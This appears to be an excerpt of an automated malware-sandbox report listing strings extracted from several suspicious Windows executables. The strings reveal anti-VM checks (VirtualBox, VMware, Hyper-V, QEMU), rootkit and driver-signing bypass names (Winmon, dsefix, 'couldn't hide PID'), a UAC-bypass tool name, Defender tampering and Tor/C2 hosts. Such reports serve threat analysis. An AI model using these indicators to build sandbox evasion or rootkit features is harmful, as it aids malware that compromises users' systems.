Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: STAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00 %+v m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3ca
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie$WINDIR% CPU (%03d %s%v: %#x, goid=, j0 = -nologo/delete19531252.5.4.32.5.
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: ameNewaPINGPOSTPathQEMUROOTH
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: ersexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindo
Source: i1crvbOZAP.exe, i1crvbOZAP.exe, 00000000.00000002.1958471199.0000029623C09000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507993198.0000000000D34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.1994414036.0000000001DAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: 11VBoxSFWINDIRWD
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: LycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd acceptactivechan<-closedcookiedirectdo
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: aryvmcixn-SR-%W
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s\|%s%s\|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: main.isRunningInsideVMWare
Source: svchost.exe, 00000003.00000003.1622429361.000001F826436000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: age#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000c5e500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: 4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: rSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507946071.0000000000CCD000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: svchost.exe, 00000003.00000002.2823218953.000001F82643E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s%d%s/%s%s:%d%s=%s"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:**@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: tVMSrvcs\|!
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: 3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs
Source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: yreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdo
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: svchost.exe, 00000003.00000002.2823107714.000001F826413000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&00000
Source: svchost.exe, 00000003.00000003.1622409125.000001F826444000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000003.2390935312.000000000479E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthorities
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: vmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ... exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC
Source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ><'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: \\.\HGFS`
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2161892424.000000000109E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: vmhgfsP
Source: svchost.exe, 00000003.00000002.2823218953.000001F82642B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: I4B42zAlYY8EYRVPVQPCuOQX.exe, 0000000F.00000002.2620868713.0000000001D9C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2507946071.0000000000CCD000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware`l5
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
Source: svchost.exe, 00000003.00000002.2822984521.000001F826402000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal 